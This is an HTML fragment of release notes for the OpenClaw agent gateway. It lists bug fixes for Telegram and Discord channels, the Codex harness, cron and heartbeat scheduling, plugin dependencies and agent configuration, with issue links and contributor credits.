<li>Channels/Telegram: honor <code>ALL_PROXY</code> / <code>all_proxy</code> and service-level <code>OPENCLAW_PROXY_URL</code> when constructing the HTTP/1-only Telegram Bot API transport, so Windows and service installs that rely on those proxy settings no longer fall back to direct egress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347549013" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74014/hovercard" href="https://github.com/openclaw/openclaw/issues/74014">#74014</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Channels/Telegram: keep raw host/network-unreachable Bot API connect failures non-fatal and route tagged polling uncaught exceptions through the Telegram restart path, so transient reachability failures no longer kill the Gateway or leave long polling stuck. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202091022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60515" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60515/hovercard" href="https://github.com/openclaw/openclaw/issues/60515">#60515</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352759456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74540" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74540/hovercard" href="https://github.com/openclaw/openclaw/issues/74540">#74540</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thacid22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thacid22">@thacid22</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ewimsatt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ewimsatt">@ewimsatt</a>.</li>
<li>Channels/Telegram: continue polling when <code>deleteWebhook</code> hits a transient network failure but <code>getWebhookInfo</code> confirms no webhook is configured, so startup does not retry cleanup forever after the webhook was already removed. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078467786" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47384/hovercard" href="https://github.com/openclaw/openclaw/pull/47384">#47384</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clovericbot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clovericbot">@clovericbot</a>.</li>
<li>Channels/Telegram: retry native quote replies without <code>reply_parameters.quote</code> when Telegram returns <code>QUOTE_TEXT_INVALID</code>, so stale or truncated quote excerpts no longer drop the whole reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353246635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74581" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74581/hovercard" href="https://github.com/openclaw/openclaw/issues/74581">#74581</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moeedahmed/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moeedahmed">@moeedahmed</a>.</li>
<li>Channels/Telegram: apply strict safe-send retry to inbound final replies when grammY wraps a pre-connect failure, while leaving ambiguous plain network envelopes single-shot to avoid duplicate visible messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348834237" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74203" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74203/hovercard" href="https://github.com/openclaw/openclaw/issues/74203">#74203</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nanli2000cn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nanli2000cn">@nanli2000cn</a>.</li>
<li>Channels/Telegram: surface polling liveness warnings in channel status and doctor when a running long-poller has not completed <code>getUpdates</code> after startup grace or its transport activity is stale, so silent polling failures no longer look clean. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74299/hovercard" href="https://github.com/openclaw/openclaw/issues/74299">#74299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</li>
<li>Channels/Telegram: publish webhook runtime state and warn when <code>setWebhook</code> has not completed after startup grace, so webhook-mode accounts no longer look healthy while registration is still failing or retrying. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74299/hovercard" href="https://github.com/openclaw/openclaw/issues/74299">#74299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Channels/Telegram: bound native command menu <code>deleteMyCommands</code> and <code>setMyCommands</code> Bot API calls and allow the same timeout-triggered transport fallback retry as other startup control calls, so Windows/WSL network stalls cannot leave command sync hanging behind an otherwise running provider. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>ACP/commands: accept forwarded ACP timeout config controls in the OpenClaw bridge, treat unsupported discard-close controls as recoverable cleanup, and restore native <code>/verbose full</code> plus no-arg status behavior, so Discord command menus and nested ACP turns no longer fail on supported session controls. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: interrupt and release native app-server turns that go quiet after an OpenClaw dynamic-tool response without sending <code>turn/completed</code>, so Discord and other chat lanes do not stay stuck in <code>processing</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: bound OpenClaw dynamic tool responses to 30 seconds and fail closed with an explicit tool result when the app-server bridge would otherwise strand the turn in <code>processing</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>TUI/status: clear stale <code>streaming</code> footer state when a final event arrives after the active run was already cleared and no tracked runs remain, while preserving concurrent-run ownership and inactive local <code>/btw</code> terminal handling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244725441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64825/hovercard" href="https://github.com/openclaw/openclaw/issues/64825">#64825</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244930419" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64842" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64842/hovercard" href="https://github.com/openclaw/openclaw/pull/64842">#64842</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244936758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64843" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64843/hovercard" href="https://github.com/openclaw/openclaw/pull/64843">#64843</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244944537" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64847" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64847/hovercard" href="https://github.com/openclaw/openclaw/pull/64847">#64847</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244992206" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64862" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64862/hovercard" href="https://github.com/openclaw/openclaw/pull/64862">#64862</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briandevans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briandevans">@briandevans</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</li>
<li>Channels/Discord: fail startup closed when Discord cannot resolve the bot's own identity and keep mention gating active when only configured mention patterns can detect mentions, so the provider no longer continues with a missing bot id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052146259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42219" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42219/hovercard" href="https://github.com/openclaw/openclaw/issues/42219">#42219</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077562944" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46856" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46856/hovercard" href="https://github.com/openclaw/openclaw/pull/46856">#46856</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090797830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49218/hovercard" href="https://github.com/openclaw/openclaw/pull/49218">#49218</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/education-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/education-01">@education-01</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>Channels/Discord: split long CJK replies at punctuation and code-point-safe fallback boundaries so Discord chunking stays readable without corrupting astral characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4037445222" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38597" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38597/hovercard" href="https://github.com/openclaw/openclaw/issues/38597">#38597</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326906134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71384/hovercard" href="https://github.com/openclaw/openclaw/pull/71384">#71384</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</li>
<li>TUI: keep the streaming watchdog alive across active tool/lifecycle proof-of-life, pause it during disconnects, and reload history after stale reconnect runs so long-running chats stop flipping to false idle or hanging on stale streaming. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291861236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69081/hovercard" href="https://github.com/openclaw/openclaw/issues/69081">#69081</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EenvoudJasper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EenvoudJasper">@EenvoudJasper</a>.</li>
<li>Browser/gateway: ignore Playwright dialog-close races from <code>Page.handleJavaScriptDialog</code> so browser automation no longer crashes the Gateway when a dialog disappears before Playwright accepts it. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041670448" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40067" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40067/hovercard" href="https://github.com/openclaw/openclaw/pull/40067">#40067</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/randyjtw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/randyjtw">@randyjtw</a>.</li>
<li>Cron/Gateway: defer missed isolated agent-turn catch-up out of the channel startup window, so overdue cron work cannot starve Discord or Telegram while providers connect after a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat/cron: defer heartbeat turns while cron work is active or queued, add opt-in <code>heartbeat.skipWhenBusy</code> for subagent/nested lane pressure, and retry busy skips without advancing the schedule so local Ollama hosts do not run heartbeat and cron prompts concurrently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105361592" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50773" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50773/hovercard" href="https://github.com/openclaw/openclaw/issues/50773">#50773</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scottgl9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scottgl9">@scottgl9</a>.</li>
<li>Agents/thinking: honor configured model <code>compat.supportedReasoningEfforts</code> entries that include <code>xhigh</code>, so custom OpenAI-compatible provider refs expose and validate <code>/think xhigh</code> consistently across command menus, Gateway sessions, agent CLI, and <code>llm-task</code>. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087419491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48904/hovercard" href="https://github.com/openclaw/openclaw/pull/48904">#48904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Milchstrassse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Milchstrassse">@Milchstrassse</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wufunc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wufunc">@wufunc</a>.</li>
<li>Vercel AI Gateway: expose provider-owned <code>/think xhigh</code> for trusted OpenAI/Codex upstream refs and Claude adaptive thinking for Anthropic upstream refs, while leaving untrusted namespaced refs on base levels. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048650454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41561" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41561/hovercard" href="https://github.com/openclaw/openclaw/pull/41561">#41561</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zcg2021/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zcg2021">@Zcg2021</a>.</li>
<li>Plugins/runtime-deps: prune stale <code>openclaw-unknown-*</code> bundled runtime dependency roots during Gateway startup while keeping recent or locked roots, so old staging debris cannot keep growing across restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: include ten more root-package runtime dependencies (<code>@agentclientprotocol/sdk</code>, <code>@lydell/node-pty</code>, <code>croner</code>, <code>dotenv</code>, <code>jiti</code>, <code>json5</code>, <code>jszip</code>, <code>markdown-it</code>, <code>tar</code>, <code>web-push</code>) in <code>MIRRORED_CORE_RUNTIME_DEP_NAMES</code> so they are mirrored into the runtime-deps tree alongside <code>semver</code> and <code>tslog</code>, preventing <code>Cannot find package 'X'</code> failures from core dist code (for example <code>qmd-manager</code>, <code>cron/schedule</code>, <code>infra/archive</code>, <code>infra/push-web</code>, <code>infra/backup-create</code>, <code>process/supervisor/adapters/pty</code>) when no enabled extension owns the dependency. Adds a static drift guard test that scans <code>src/</code> for value imports of root-package deps and fails CI when one is missing from the mirror allowlist or extension-owned set. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348806638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74199" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74199/hovercard" href="https://github.com/openclaw/openclaw/issues/74199">#74199</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxpuppet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxpuppet">@maxpuppet</a>.</li>
<li>Ollama: compose caller abort signals with guarded-fetch timeouts for native <code>/api/chat</code> streams, so <code>/stop</code> and early cancellation still interrupt local Ollama requests that also carry provider timeout budgets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348337046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74133/hovercard" href="https://github.com/openclaw/openclaw/pull/74133">#74133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Doctor/TTS: migrate legacy <code>messages.tts.enabled</code>, agent TTS, channel TTS, and voice-call plugin TTS toggles to <code>auto</code> mode during <code>openclaw doctor --fix</code>, matching the documented TTS config contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/logs: fall back to the configured Gateway file log when implicit loopback Gateway connections close or time out before or during <code>logs.tail</code>, so <code>openclaw logs</code> still works while diagnosing local-model Gateway disconnects. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347954374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74078" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74078/hovercard" href="https://github.com/openclaw/openclaw/issues/74078">#74078</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a>.</li>
<li>MCP/plugins: stringify non-array plugin tool results with chat-content coercion instead of default object stringification, so MCP callers receive useful JSON/text content from plugin tools. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory/QMD: make gateway-start QMD refresh opt-in via <code>memory.qmd.update.startup</code>, keep normal memory access lazy, preserve interactive file watching, and align watcher dependency/build ignores with QMD's scanner so cold gateway startup no longer imports or initializes QMD by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Channels/Discord: remove Discord-owned queued-run timeout replies through the shared channel lifecycle queue while preserving message ordering and compatibility timeout constants, so long Discord turns stay governed by session/tool/runtime lifecycle instead of channel fallback errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Agents/tools: clamp <code>process.poll</code> waits to 30 seconds, advertise that cap in the tool schema, and honor abort signals while waiting, so long command polls cannot pin agent responsiveness after cancellation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK: add tracked Discord component-message helpers and a Telegram account-resolution compatibility facade, so existing plugins using those subpaths resolve while new plugins stay on generic channel SDK contracts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Shared labels: preserve Unicode combining marks and NFC-equivalent accented text in group/channel slug normalization so non-Latin labels no longer lose meaningful characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185745477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58932/hovercard" href="https://github.com/openclaw/openclaw/issues/58932">#58932</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185851212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58942" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58942/hovercard" href="https://github.com/openclaw/openclaw/pull/58942">#58942</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186444405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58995" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58995/hovercard" href="https://github.com/openclaw/openclaw/pull/58995">#58995</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fengqing-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fengqing-git">@fengqing-git</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Starhappysh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Starhappysh">@Starhappysh</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koen666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koen666">@koen666</a>.</li>
<li>Channels/Telegram: include probed video width and height when sending regular Telegram videos, so portrait clips render with the correct orientation instead of being stretched by clients. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3950913740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/18915" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/18915/hovercard" href="https://github.com/openclaw/openclaw/pull/18915">#18915</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/storyarcade/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/storyarcade">@storyarcade</a>.</li>
<li>Docs/Hetzner: clarify that SSH tunnel access requires <code>AllowTcpForwarding local</code> before running <code>ssh -L</code>, so hardened VPS sshd configs do not block loopback Gateway access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136710669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54557" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54557/hovercard" href="https://github.com/openclaw/openclaw/issues/54557">#54557</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136836006" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54564" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54564/hovercard" href="https://github.com/openclaw/openclaw/pull/54564">#54564</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141007846" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54954" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54954/hovercard" href="https://github.com/openclaw/openclaw/pull/54954">#54954</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/satishkc7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/satishkc7">@satishkc7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blackstrype/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blackstrype">@blackstrype</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Aftabbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Aftabbs">@Aftabbs</a>.</li>
<li>Agents/config: preserve authored <code>agents.defaults.params</code> and per-model <code>agents.defaults.models[].params</code> during narrowed internal config writes, so OpenAI transport overrides such as <code>transport: "sse"</code> and <code>openaiWsWarmup: false</code> are not stripped from <code>openclaw.json</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344027749" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73607/hovercard" href="https://github.com/openclaw/openclaw/issues/73607">#73607</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quangtran88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quangtran88">@quangtran88</a>.</li>
<li>Agents/model config: resolve per-model extra params through canonical model keys while preserving legacy double-prefixed fallback entries, so provider-prefixed model ids such as <code>openrouter/auto</code> keep their configured runtime params. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066560428" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44319" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44319/hovercard" href="https://github.com/openclaw/openclaw/pull/44319">#44319</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HenryXiaoYang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HenryXiaoYang">@HenryXiaoYang</a>.</li>
<li>Gateway/shutdown: report structured shutdown warnings and HTTP close timeout warnings through <code>ShutdownResult</code> while preserving lifecycle hook hardening. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046867239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41296" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41296/hovercard" href="https://github.com/openclaw/openclaw/pull/41296">#41296</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edenfunf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edenfunf">@edenfunf</a>.</li>
